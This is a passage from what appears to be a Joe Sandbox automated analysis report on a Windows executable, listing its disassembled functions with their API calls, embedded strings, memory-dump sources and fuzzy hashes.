                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3413494760-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 482f3b1f0bd705d72ebf0bcdddfb27694f63f3fe8f528a3bcd533af3ba5d9e97
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 77b59fa0745152fd1b6386ccdd9ca850b9b7f4abb66e551d88b584249de3d357
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 482f3b1f0bd705d72ebf0bcdddfb27694f63f3fe8f528a3bcd533af3ba5d9e97
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F83150B2600746AFC714DF7AC880996FBA8FF88310B44892EE64983641D735F554CBA5
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004377B4 Relevance: 15.1, APIs: 10, Instructions: 97threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 004377D7
                                                                                                                                                                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32(00000000,?,?,?,?,0045FDE0,?,?,00000001), ref: 004377EB
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(00000000), ref: 004377F8
                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 00437809
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(?,00000001), ref: 00437819
                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043782E
                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043783D
                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 0043788D
                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378A1
                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378AC
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2156557900-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: cf5237ead9178137421241ba4763476990ac919c12b5de4495d1c20f4e3090f4
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B0316FB1504341AFD768EF28DC88A7BB7A9EF9D310F14182EF44197250D7B89C44CB69
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045F776 Relevance: 14.4, APIs: 5, Strings: 3, Instructions: 446COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __wcsicoll
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0%d$DOWN$OFF
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3832890014-468733193
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 3901981f80fa7430cd77b89167089bc3925961a07aad88d0cc2f25a35af8916b
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B7F1D8614083856DEB21EB21C845BAF7BE85F95309F08092FF98212193D7BCD68DC76B
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045E912 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 353timeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • VariantInit.OLEAUT32(00000000), ref: 0045E959
                                                                                                                                                                                                                                                                                                                                                                                                                • VariantCopy.OLEAUT32(00000000), ref: 0045E963
                                                                                                                                                                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32 ref: 0045E970
                                                                                                                                                                                                                                                                                                                                                                                                                • VariantTimeToSystemTime.OLEAUT32 ref: 0045EAEB
                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 0045EB1F
                                                                                                                                                                                                                                                                                                                                                                                                                • VarR8FromDec.OLEAUT32(?,?), ref: 0045EB61
                                                                                                                                                                                                                                                                                                                                                                                                                • VariantInit.OLEAUT32(00000000), ref: 0045EBE7
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                • %4d%02d%02d%02d%02d%02d, xrefs: 0045EB19
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Variant$InitTime$ClearCopyFromSystem__swprintf
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: %4d%02d%02d%02d%02d%02d
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 43541914-1568723262
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 11e75855299ae3405c424824ea34456a4e4a4cfcb6a1aa253e4cc896e09893c9
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: db8708ae94f177a13b26e6bf0e0b18ed2eb17208bc27bd00c320e315e6f9d40a
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 11e75855299ae3405c424824ea34456a4e4a4cfcb6a1aa253e4cc896e09893c9
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ABC1F4BB1006019BC704AF06D480666F7A1FFD4322F14896FED984B341DB3AE95ED7A6
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0042FE54 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 298sleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FE66
                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A), ref: 0042FE6E
                                                                                                                                                                                                                                                                                                                                                                                                                • InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FF5D
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: DecrementInterlocked$Sleep
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0vH$0vH$4RH0vH$@COM_EVENTOBJ
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2250217261-3412429629
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 7d20af892ce27232a3ff337619be48fed7d74e1bde2de334c7b49ab88d15dd8c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 990b5f35a06538e4ae7b6c94f393f4a5fafaaf51bfa382c75dcb300f2d234fa3
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7d20af892ce27232a3ff337619be48fed7d74e1bde2de334c7b49ab88d15dd8c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E0B1C0715083009FC714EF54C990A5FB3E4AF98304F508A2FF495972A2DB78ED4ACB9A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004689FF Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 288COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 0-1603158881
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 1d39c91c6ba170ccd8bd44326015c92659356e06a413e753493f98454e3169a0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 49A1D3B14043459BCB20EF50CC81BDE37A4AF94348F44891FF9896B182EF79A64DC76A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00479C97 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 274COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • _memset.LIBCMT ref: 00479D1F
                                                                                                                                                                                                                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00479F06
                                                                                                                                                                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00479F11
                                                                                                                                                                                                                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00479DF7
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00467626: VariantInit.OLEAUT32(00000000), ref: 00467666
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00467626: VariantCopy.OLEAUT32(00000000,00479BD3), ref: 00467670
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00467626: VariantClear.OLEAUT32 ref: 0046767D
                                                                                                                                                                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00479F9C
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Variant$Copy$ClearInit$ErrorLast_memset
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: F$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 665237470-60002521
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 799f1794578ead7d01377608c22e1fb401aa4fc5ffca8a64c02b8280356d09a3
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6091B272204341AFD720DF64D880EABB7E9EFC4314F50891EF28987291D7B9AD45C766
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0046A75F Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 179registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                                                                                                                                                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046A84D
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ConnectRegistry_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: HH
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 535477410-2761332787
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 68d8ff7817732ac0dd8275009c421e29eb5870de2046e22f9b94a35ba54c9d9f
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FE617FB56083009FD304EF65C981F6BB7E4AF88704F14891EF681A7291D678ED09CB97
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045F2C5 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 146windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • _memset.LIBCMT ref: 0045F317
                                                                                                                                                                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F367
                                                                                                                                                                                                                                                                                                                                                                                                                • IsMenu.USER32(?), ref: 0045F380
                                                                                                                                                                                                                                                                                                                                                                                                                • CreatePopupMenu.USER32 ref: 0045F3C5
                                                                                                                                                                                                                                                                                                                                                                                                                • GetMenuItemCount.USER32(?), ref: 0045F42F
                                                                                                                                                                                                                                                                                                                                                                                                                • InsertMenuItemW.USER32(?,?,00000001,?), ref: 0045F45B
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0$2
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3311875123-3793063076
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 6c7ab59355789d00cbd42ef361c1bd9312a1bc9220e92816940967e3bd29aecc
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E451CF702043409FD710CF69D888B6BBBE4AFA5319F104A3EFD9586292D378994DCB67
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0043717F Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 46windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,004A8E80,00000100,00000100,?,C:\Users\user\Desktop\AENiBH7X1q.exe), ref: 0043719E
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadStringW.USER32(00000000), ref: 004371A7
                                                                                                                                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004371BD
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadStringW.USER32(00000000), ref: 004371C0
                                                                                                                                                                                                                                                                                                                                                                                                                • _printf.LIBCMT ref: 004371EC
                                                                                                                                                                                                                                                                                                                                                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00437208
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\user\Desktop\AENiBH7X1q.exe, xrefs: 00437189
                                                                                                                                                                                                                                                                                                                                                                                                                • %s (%d) : ==> %s: %s %s, xrefs: 004371E7
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: HandleLoadModuleString$Message_printf
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\AENiBH7X1q.exe
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 220974073-418114886
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: cc9e6972dbc5209964c20f0f7d1f7455a13934f6c555fd98bc0bf92a0502fb90
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7014FB2A543447AE620EB549D06FFB365CABC4B01F444C1EB794A60C0AAF865548BBA
